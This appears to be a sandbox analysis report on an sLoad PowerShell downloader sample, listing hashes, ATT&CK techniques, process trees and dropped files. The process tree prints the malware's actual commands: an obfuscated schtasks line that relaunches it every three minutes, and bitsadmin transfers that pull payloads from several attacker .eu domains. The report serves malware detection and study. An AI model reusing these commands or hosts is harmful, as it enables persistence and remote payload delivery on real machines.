sload | 0af312c6ae5a1d708966fb550dcae81f59db5a54421803b40bd8b2752fb7ee89

Analysis

max time kernel
1704s
max time network
1627s
platform
windows11-21h2_x64
resource
win11-20241007-en
resource tags

arch:x64arch:x86image:win11-20241007-enlocale:en-usos:windows11-21h2-x64system
submitted
25-11-2024 13:17

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

FILE POWERSHELL MALEVOLO.ps1
Size

104KB
MD5

ef3e1a843da4fb31012afe474447c98b
SHA1

0ca2a653b3cc7d8630e2938c18ce5dda91e0b9b7
SHA256

488d775b3e2118b63dfc26020e5e7a3aa95951f78099ce8e203d50b3e1e0c66d
SHA512

149744665463591cea2798f4efd90b7d5b24c763270e8530c40b7520892b67b0f92b0268456eaa5c545a1984cddca45dddb4e0461c72eee0b3f8db9592f1ec55
SSDEEP

3072:ZtW7qBQqhDmaA8Hch3g+XdZQaPU91ajO3vQSo:gqBQqhDmaA8HW3g+XdZQaPU91ajO3vQH

Score

10^/10

sload dropper execution stealer trojan

Malware Config

Signatures

Sload family
sload
sLoad
sLoad is a PowerShell downloader that can exfiltrate system information and deliver additional payloads.
trojan stealer sload

Download via BitsAdmin 1 TTPs 10 IoCs

dropper

BITS Jobs

T1197

Processes:

bitsadmin.exebitsadmin.exebitsadmin.exebitsadmin.exebitsadmin.exebitsadmin.exebitsadmin.exebitsadmin.exebitsadmin.exebitsadmin.exe

pid	Process
3700	bitsadmin.exe
3180	bitsadmin.exe
1972	bitsadmin.exe
4732	bitsadmin.exe
4900	bitsadmin.exe
2996	bitsadmin.exe
1936	bitsadmin.exe
2324	bitsadmin.exe
2012	bitsadmin.exe
2888	bitsadmin.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 6 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

pid	Process
1080	powershell.exe
2276	powershell.exe
4000	powershell.exe
1312	powershell.exe
1572	powershell.exe
4628	powershell.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

Processes:

schtasks.exe

pid	Process
3688	schtasks.exe

Suspicious behavior: EnumeratesProcesses 27 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

pid	Process
1080	powershell.exe
1080	powershell.exe
1080	powershell.exe
2276	powershell.exe
2276	powershell.exe
2276	powershell.exe
2276	powershell.exe
2276	powershell.exe
4000	powershell.exe
4000	powershell.exe
4000	powershell.exe
4000	powershell.exe
4000	powershell.exe
1312	powershell.exe
1312	powershell.exe
1312	powershell.exe
1312	powershell.exe
1312	powershell.exe
1572	powershell.exe
1572	powershell.exe
1572	powershell.exe
1572	powershell.exe
1572	powershell.exe
4628	powershell.exe
4628	powershell.exe
4628	powershell.exe
4628	powershell.exe

Suspicious use of AdjustPrivilegeToken 6 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

description	pid	Process
Token: SeDebugPrivilege	1080	powershell.exe
Token: SeDebugPrivilege	2276	powershell.exe
Token: SeDebugPrivilege	4000	powershell.exe
Token: SeDebugPrivilege	1312	powershell.exe
Token: SeDebugPrivilege	1572	powershell.exe
Token: SeDebugPrivilege	4628	powershell.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

powershell.execmd.exewscript.EXEpowershell.execmd.execmd.execmd.exewscript.EXEpowershell.execmd.execmd.execmd.exewscript.EXEpowershell.execmd.execmd.execmd.exewscript.EXEpowershell.exe

description	pid	Process	procid_target
PID 1080 wrote to memory of 3132	1080	powershell.exe	81
PID 1080 wrote to memory of 3132	1080	powershell.exe	81
PID 1080 wrote to memory of 240	1080	powershell.exe	82
PID 1080 wrote to memory of 240	1080	powershell.exe	82
PID 1080 wrote to memory of 2840	1080	powershell.exe	84
PID 1080 wrote to memory of 2840	1080	powershell.exe	84
PID 2840 wrote to memory of 3688	2840	cmd.exe	86
PID 2840 wrote to memory of 3688	2840	cmd.exe	86
PID 768 wrote to memory of 2276	768	wscript.EXE	88
PID 768 wrote to memory of 2276	768	wscript.EXE	88
PID 2276 wrote to memory of 3136	2276	powershell.exe	90
PID 2276 wrote to memory of 3136	2276	powershell.exe	90
PID 2276 wrote to memory of 948	2276	powershell.exe	93
PID 2276 wrote to memory of 948	2276	powershell.exe	93
PID 2276 wrote to memory of 920	2276	powershell.exe	95
PID 2276 wrote to memory of 920	2276	powershell.exe	95
PID 2276 wrote to memory of 840	2276	powershell.exe	97
PID 2276 wrote to memory of 840	2276	powershell.exe	97
PID 948 wrote to memory of 4340	948	cmd.exe	99
PID 948 wrote to memory of 4340	948	cmd.exe	99
PID 840 wrote to memory of 3700	840	cmd.exe	100
PID 840 wrote to memory of 3700	840	cmd.exe	100
PID 920 wrote to memory of 3180	920	cmd.exe	102
PID 920 wrote to memory of 3180	920	cmd.exe	102
PID 4820 wrote to memory of 4000	4820	wscript.EXE	105
PID 4820 wrote to memory of 4000	4820	wscript.EXE	105
PID 4000 wrote to memory of 3264	4000	powershell.exe	107
PID 4000 wrote to memory of 3264	4000	powershell.exe	107
PID 4000 wrote to memory of 1044	4000	powershell.exe	110
PID 4000 wrote to memory of 1044	4000	powershell.exe	110
PID 4000 wrote to memory of 1160	4000	powershell.exe	112
PID 4000 wrote to memory of 1160	4000	powershell.exe	112
PID 4000 wrote to memory of 756	4000	powershell.exe	113
PID 4000 wrote to memory of 756	4000	powershell.exe	113
PID 1044 wrote to memory of 4456	1044	cmd.exe	116
PID 1044 wrote to memory of 4456	1044	cmd.exe	116
PID 1160 wrote to memory of 2996	1160	cmd.exe	118
PID 1160 wrote to memory of 2996	1160	cmd.exe	118
PID 756 wrote to memory of 1936	756	cmd.exe	119
PID 756 wrote to memory of 1936	756	cmd.exe	119
PID 4324 wrote to memory of 1312	4324	wscript.EXE	121
PID 4324 wrote to memory of 1312	4324	wscript.EXE	121
PID 1312 wrote to memory of 3996	1312	powershell.exe	123
PID 1312 wrote to memory of 3996	1312	powershell.exe	123
PID 1312 wrote to memory of 3656	1312	powershell.exe	126
PID 1312 wrote to memory of 3656	1312	powershell.exe	126
PID 1312 wrote to memory of 3120	1312	powershell.exe	128
PID 1312 wrote to memory of 3120	1312	powershell.exe	128
PID 1312 wrote to memory of 1928	1312	powershell.exe	130
PID 1312 wrote to memory of 1928	1312	powershell.exe	130
PID 3656 wrote to memory of 1684	3656	cmd.exe	132
PID 3656 wrote to memory of 1684	3656	cmd.exe	132
PID 1928 wrote to memory of 2324	1928	cmd.exe	133
PID 1928 wrote to memory of 2324	1928	cmd.exe	133
PID 3120 wrote to memory of 2012	3120	cmd.exe	134
PID 3120 wrote to memory of 2012	3120	cmd.exe	134
PID 3908 wrote to memory of 1572	3908	wscript.EXE	136
PID 3908 wrote to memory of 1572	3908	wscript.EXE	136
PID 1572 wrote to memory of 128	1572	powershell.exe	138
PID 1572 wrote to memory of 128	1572	powershell.exe	138
PID 1572 wrote to memory of 4840	1572	powershell.exe	141
PID 1572 wrote to memory of 4840	1572	powershell.exe	141
PID 1572 wrote to memory of 1904	1572	powershell.exe	143
PID 1572 wrote to memory of 1904	1572	powershell.exe	143

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\FILE POWERSHELL MALEVOLO.ps1"
1⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1080
- C:\Windows\system32\schtasks.exe
  "C:\Windows\system32\schtasks.exe" /query /FO CSV /v
  2⤵
  PID:3132
- C:\Windows\system32\schtasks.exe
  "C:\Windows\system32\schtasks.exe" /change /tn GoFast /disable
  2⤵
  PID:240
- C:\Windows\system32\cmd.exe
  "C:\Windows\system32\cmd.exe" /C schtasks /F /%windir:~0,1%reate /sc minute /mo 3 /TN "S0vZxbPlMFr" /ST 07:00 /TR "wscript /E:vbscript c:\users\Admin\AppData\Roaming\\vZxbPlMFr\EDwNrSvl.tmp"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2840
- - C:\Windows\system32\schtasks.exe
    schtasks /F /Create /sc minute /mo 3 /TN "S0vZxbPlMFr" /ST 07:00 /TR "wscript /E:vbscript c:\users\Admin\AppData\Roaming\\vZxbPlMFr\EDwNrSvl.tmp"
    3⤵
    - Scheduled Task/Job: Scheduled Task
    PID:3688

C:\Windows\system32\wscript.EXE
C:\Windows\system32\wscript.EXE /E:vbscript c:\users\Admin\AppData\Roaming\\vZxbPlMFr\EDwNrSvl.tmp
1⤵
- Suspicious use of WriteProcessMemory
PID:768
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep bypass -file EDwNrSvl.ps1
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2276
- - C:\Windows\system32\getmac.exe
    "C:\Windows\system32\getmac.exe" /fo table
    3⤵
    PID:3136
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /C bitsadmin /reset
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:948
  - - C:\Windows\system32\bitsadmin.exe
      bitsadmin /reset
      4⤵
      PID:4340
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /C bitsadmin /transfer osEiHwTc /%windir:~6,1%ownload /priority FOREGROUND "https://uyiuwbn.eu/topic//main.php?ch=1&i=d95e76a952a807586d06baaa8c85c49f" C:\users\Admin\AppData\Roaming\vZxbPlMFr\0_svchost.log
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:920
  - - C:\Windows\system32\bitsadmin.exe
      bitsadmin /transfer osEiHwTc /download /priority FOREGROUND "https://uyiuwbn.eu/topic//main.php?ch=1&i=d95e76a952a807586d06baaa8c85c49f" C:\users\Admin\AppData\Roaming\vZxbPlMFr\0_svchost.log
      4⤵
      Download via BitsAdmin
      PID:3180
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /C bitsadmin /transfer uwXGzjDa /%windir:~6,1%ownload /priority FOREGROUND "https://uognbcg.eu/topic//main.php?ch=1&i=d95e76a952a807586d06baaa8c85c49f" C:\users\Admin\AppData\Roaming\vZxbPlMFr\1_svchost.log
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:840
  - - C:\Windows\system32\bitsadmin.exe
      bitsadmin /transfer uwXGzjDa /download /priority FOREGROUND "https://uognbcg.eu/topic//main.php?ch=1&i=d95e76a952a807586d06baaa8c85c49f" C:\users\Admin\AppData\Roaming\vZxbPlMFr\1_svchost.log
      4⤵
      Download via BitsAdmin
      PID:3700

C:\Windows\system32\wscript.EXE
C:\Windows\system32\wscript.EXE /E:vbscript c:\users\Admin\AppData\Roaming\\vZxbPlMFr\EDwNrSvl.tmp
1⤵
- Suspicious use of WriteProcessMemory
PID:4820
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep bypass -file EDwNrSvl.ps1
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:4000
- - C:\Windows\system32\getmac.exe
    "C:\Windows\system32\getmac.exe" /fo table
    3⤵
    PID:3264
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /C bitsadmin /reset
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1044
  - - C:\Windows\system32\bitsadmin.exe
      bitsadmin /reset
      4⤵
      PID:4456
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /C bitsadmin /transfer cmzfqEBe /%windir:~6,1%ownload /priority FOREGROUND "https://uyiuwbn1.eu/topic//main.php?ch=1&i=d95e76a952a807586d06baaa8c85c49f" C:\users\Admin\AppData\Roaming\vZxbPlMFr\0_svchost.log
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1160
  - - C:\Windows\system32\bitsadmin.exe
      bitsadmin /transfer cmzfqEBe /download /priority FOREGROUND "https://uyiuwbn1.eu/topic//main.php?ch=1&i=d95e76a952a807586d06baaa8c85c49f" C:\users\Admin\AppData\Roaming\vZxbPlMFr\0_svchost.log
      4⤵
      Download via BitsAdmin
      PID:2996
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /C bitsadmin /transfer McrBUiXZ /%windir:~6,1%ownload /priority FOREGROUND "https://uognbcg1.eu/topic//main.php?ch=1&i=d95e76a952a807586d06baaa8c85c49f" C:\users\Admin\AppData\Roaming\vZxbPlMFr\1_svchost.log
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:756
  - - C:\Windows\system32\bitsadmin.exe
      bitsadmin /transfer McrBUiXZ /download /priority FOREGROUND "https://uognbcg1.eu/topic//main.php?ch=1&i=d95e76a952a807586d06baaa8c85c49f" C:\users\Admin\AppData\Roaming\vZxbPlMFr\1_svchost.log
      4⤵
      Download via BitsAdmin
      PID:1936

C:\Windows\system32\wscript.EXE
C:\Windows\system32\wscript.EXE /E:vbscript c:\users\Admin\AppData\Roaming\\vZxbPlMFr\EDwNrSvl.tmp
1⤵
- Suspicious use of WriteProcessMemory
PID:4324
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep bypass -file EDwNrSvl.ps1
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:1312
- - C:\Windows\system32\getmac.exe
    "C:\Windows\system32\getmac.exe" /fo table
    3⤵
    PID:3996
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /C bitsadmin /reset
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3656
  - - C:\Windows\system32\bitsadmin.exe
      bitsadmin /reset
      4⤵
      PID:1684
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /C bitsadmin /transfer sUJbtRVB /%windir:~6,1%ownload /priority FOREGROUND "https://uyiuwbn2.eu/topic//main.php?ch=1&i=d95e76a952a807586d06baaa8c85c49f" C:\users\Admin\AppData\Roaming\vZxbPlMFr\0_svchost.log
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3120
  - - C:\Windows\system32\bitsadmin.exe
      bitsadmin /transfer sUJbtRVB /download /priority FOREGROUND "https://uyiuwbn2.eu/topic//main.php?ch=1&i=d95e76a952a807586d06baaa8c85c49f" C:\users\Admin\AppData\Roaming\vZxbPlMFr\0_svchost.log
      4⤵
      Download via BitsAdmin
      PID:2012
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /C bitsadmin /transfer vcMjOZCs /%windir:~6,1%ownload /priority FOREGROUND "https://uognbcg2.eu/topic//main.php?ch=1&i=d95e76a952a807586d06baaa8c85c49f" C:\users\Admin\AppData\Roaming\vZxbPlMFr\1_svchost.log
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1928
  - - C:\Windows\system32\bitsadmin.exe
      bitsadmin /transfer vcMjOZCs /download /priority FOREGROUND "https://uognbcg2.eu/topic//main.php?ch=1&i=d95e76a952a807586d06baaa8c85c49f" C:\users\Admin\AppData\Roaming\vZxbPlMFr\1_svchost.log
      4⤵
      Download via BitsAdmin
      PID:2324

C:\Windows\system32\wscript.EXE
C:\Windows\system32\wscript.EXE /E:vbscript c:\users\Admin\AppData\Roaming\\vZxbPlMFr\EDwNrSvl.tmp
1⤵
- Suspicious use of WriteProcessMemory
PID:3908
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep bypass -file EDwNrSvl.ps1
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:1572
- - C:\Windows\system32\getmac.exe
    "C:\Windows\system32\getmac.exe" /fo table
    3⤵
    PID:128
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /C bitsadmin /reset
    3⤵
    PID:4840
  - - C:\Windows\system32\bitsadmin.exe
      bitsadmin /reset
      4⤵
      PID:200
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /C bitsadmin /transfer OXsmrzJu /%windir:~6,1%ownload /priority FOREGROUND "https://uyiuwbn3.eu/topic//main.php?ch=1&i=d95e76a952a807586d06baaa8c85c49f" C:\users\Admin\AppData\Roaming\vZxbPlMFr\0_RuntimeBroker.log
    3⤵
    PID:1904
  - - C:\Windows\system32\bitsadmin.exe
      bitsadmin /transfer OXsmrzJu /download /priority FOREGROUND "https://uyiuwbn3.eu/topic//main.php?ch=1&i=d95e76a952a807586d06baaa8c85c49f" C:\users\Admin\AppData\Roaming\vZxbPlMFr\0_RuntimeBroker.log
      4⤵
      Download via BitsAdmin
      PID:2888
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /C bitsadmin /transfer aNyuwSzK /%windir:~6,1%ownload /priority FOREGROUND "https://uognbcg3.eu/topic//main.php?ch=1&i=d95e76a952a807586d06baaa8c85c49f" C:\users\Admin\AppData\Roaming\vZxbPlMFr\1_RuntimeBroker.log
    3⤵
    PID:2796
  - - C:\Windows\system32\bitsadmin.exe
      bitsadmin /transfer aNyuwSzK /download /priority FOREGROUND "https://uognbcg3.eu/topic//main.php?ch=1&i=d95e76a952a807586d06baaa8c85c49f" C:\users\Admin\AppData\Roaming\vZxbPlMFr\1_RuntimeBroker.log
      4⤵
      Download via BitsAdmin
      PID:4732

C:\Windows\system32\wscript.EXE
C:\Windows\system32\wscript.EXE /E:vbscript c:\users\Admin\AppData\Roaming\\vZxbPlMFr\EDwNrSvl.tmp
1⤵
PID:1684
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep bypass -file EDwNrSvl.ps1
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:4628
- - C:\Windows\system32\getmac.exe
    "C:\Windows\system32\getmac.exe" /fo table
    3⤵
    PID:2936
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /C bitsadmin /reset
    3⤵
    PID:1512
  - - C:\Windows\system32\bitsadmin.exe
      bitsadmin /reset
      4⤵
      PID:3164
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /C bitsadmin /transfer mPShuvlc /%windir:~6,1%ownload /priority FOREGROUND "https://uyiuwbn4.eu/topic//main.php?ch=1&i=d95e76a952a807586d06baaa8c85c49f" C:\users\Admin\AppData\Roaming\vZxbPlMFr\0_svchost.log
    3⤵
    PID:2636
  - - C:\Windows\system32\bitsadmin.exe
      bitsadmin /transfer mPShuvlc /download /priority FOREGROUND "https://uyiuwbn4.eu/topic//main.php?ch=1&i=d95e76a952a807586d06baaa8c85c49f" C:\users\Admin\AppData\Roaming\vZxbPlMFr\0_svchost.log
      4⤵
      Download via BitsAdmin
      PID:4900
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /C bitsadmin /transfer zIhkMCvg /%windir:~6,1%ownload /priority FOREGROUND "https://uognbcg4.eu/topic//main.php?ch=1&i=d95e76a952a807586d06baaa8c85c49f" C:\users\Admin\AppData\Roaming\vZxbPlMFr\1_svchost.log
    3⤵
    PID:2428
  - - C:\Windows\system32\bitsadmin.exe
      bitsadmin /transfer zIhkMCvg /download /priority FOREGROUND "https://uognbcg4.eu/topic//main.php?ch=1&i=d95e76a952a807586d06baaa8c85c49f" C:\users\Admin\AppData\Roaming\vZxbPlMFr\1_svchost.log
      4⤵
      Download via BitsAdmin
      PID:1972

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Persistence

BITS Jobs

T1197

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

BITS Jobs

T1197

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_lgfoefmz.ctd.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\users\Admin\AppData\Roaming\vZxbPlMFr\EDwNrSvl.ps1

Filesize
1KB

MD5
c7e507d225c696fadc57cd6a0308733c

SHA1
ddd02e0bf9c684539d7b41673def86b438bdb3f2

SHA256
280e4a6d2bfebb45249ef0f23cfb901a6c7318e2fc730be23d5df460a55cfef9

SHA512
4d1c4e5e696166e2f05e88314546bf5f56e0b7d43d876ac9002aaeca9f44e6aa15767c532b62f553366143a3a851df3cb2fea4123ebec4144d73a98aed60cc75

Download Submit
C:\users\Admin\AppData\Roaming\vZxbPlMFr\system.ini

Filesize
160KB

MD5
911c95cef0824a684d2479804eb8cf19

SHA1
b72c5d8b9f0eafe0da129feedf162e479a3e1718

SHA256
0d3caf29e9098f00ef0e6f76e9426ed49bdfd8961b6128a3bf3b0274cc6b1c1b

SHA512
bfd8c85700db69c261d0676bfa8199eb3f079c089364ea7f734f85e5fae103347ceb74fc29c23ae59803cc3878298853b8d653fa1d6cac5ed53302b9b03b835a

Download Submit
C:\users\Admin\AppData\Roaming\vZxbPlMFr\win.ini

Filesize
1KB

MD5
f3e4808ac14e8e115363902a0cbbdb6d

SHA1
a984a9abfdae900df5733d3c51627afccbbd5201

SHA256
2e77398371a5d0f40bcc5702220c964ea06595d2af3e166d16e49203ba5d1aaf

SHA512
c79fb71bd3a4b5f62b1d3d50c6da91057510b2ecf4014bf569f4efe80e2d4ff5280aafd538cbf740feacb18802ed14806248bf6178a53cdb325fb93d98f89de0

Download Submit
C:\users\Admin\AppData\Roaming\vZxbPlMFr\win.ini

Filesize
1KB

MD5
b3ce2e145dad3e77b202967d41024bd4

SHA1
ca95f3e0592f27f917f8531f2ed4a94140946c40

SHA256
808b64f74b29efc2266b0b6fa901f18e35aa15d54d154ab36446f8ccdc5516f3

SHA512
f4734706c8fa077dd93cf70edb059bbccbc3b7515ddc5f2128fabf303c06dd9444f546a1214d673a01ea041e3e32ce2869c00cad99a9d7b4e48359c9d9135f0a

Download Submit
C:\users\Admin\AppData\Roaming\vZxbPlMFr\win.ini

Filesize
1KB

MD5
cf658adee8aa2608dbcf32a8c000cf33

SHA1
a7237383d07c3b0b102338eb0e1ed5497dbf849f

SHA256
fdcc6b6046f1d8d81ae91556aa410292186dd9923248eaddfeb782335f70b8ed

SHA512
e64a884ad2da0c8751f115160a5b8832a47e262f1d1c7dce08f4da16624537bcb3197d3c6246b1bb7806965ff2ffbfc72a4184fff7cff9e172b69a3e54041a6f

Download Submit
C:\users\Admin\AppData\Roaming\vZxbPlMFr\win.ini

Filesize
1KB

MD5
a30f92e4c95009a5719b64f55da6fb38

SHA1
75d952fb8801854d60da881638e154699f3d0c01

SHA256
0bacfa84e2ae720d7331ad868f76c1396b214258547374a52e5adc95b253e7c9

SHA512
41d5c99b6231dbbfa12ea5453dc74561028c358b50da2526fa8e2dd6fc757d6a0e65e80c869ffa14bc221fc2384810f192daebdc3ae08ab531aaa4092b7933fc

Download Submit
C:\users\Admin\AppData\Roaming\vZxbPlMFr\win.ini

Filesize
1KB

MD5
6bc48cdb7c7a91feef1e7566864795f0

SHA1
d999ac0f18fb8d32fb77c13274d5b28ca7d84ae6

SHA256
181cb9453df08a1bad8daa0ff594d552d249ce8ad8a966655df9802966dc193b

SHA512
2fb928373725d0917da038237ba09112adcfa15bfb6881c287f5e582265021f2ab322d7eba5f9a6b49ef0fc8be52f990648d14edaf33d03633bc6087617efee4

Download Submit
\??\c:\users\Admin\AppData\Roaming\vZxbPlMFr\EDwNrSvl.tmp

Filesize
1KB

MD5
a9bddb45172c826e99c42d407009dd57

SHA1
cbfe4946a742e1cf0ca846c0de392f7e362ffcfd

SHA256
fa076785586c1f5733854a3866d0a41167c09f8bb85d4e8108c65bd5d2a136bc

SHA512
2466fb9203e5452341447f308cd8b9913dadcfdea5a7ae9aab276d05b5ed4432e08d8a09ba3190cd40ed363ba10ccfd12d1b8c7b95c841a1a33d6acf9f4a25c5

Download Submit
memory/1080-12-0x00007FFEF38D0000-0x00007FFEF4392000-memory.dmp

Filesize
10.8MB

Download
memory/1080-17-0x00007FFEF38D0000-0x00007FFEF4392000-memory.dmp

Filesize
10.8MB

Download
memory/1080-11-0x0000027E3E150000-0x0000027E3E172000-memory.dmp

Filesize
136KB

Download
memory/1080-10-0x00007FFEF38D0000-0x00007FFEF4392000-memory.dmp

Filesize
10.8MB

Download
memory/1080-9-0x00007FFEF38D0000-0x00007FFEF4392000-memory.dmp

Filesize
10.8MB

Download
memory/1080-0-0x00007FFEF38D3000-0x00007FFEF38D5000-memory.dmp

Filesize
8KB

Download
memory/2276-29-0x0000020DB5480000-0x0000020DB59A8000-memory.dmp

Filesize
5.2MB

Download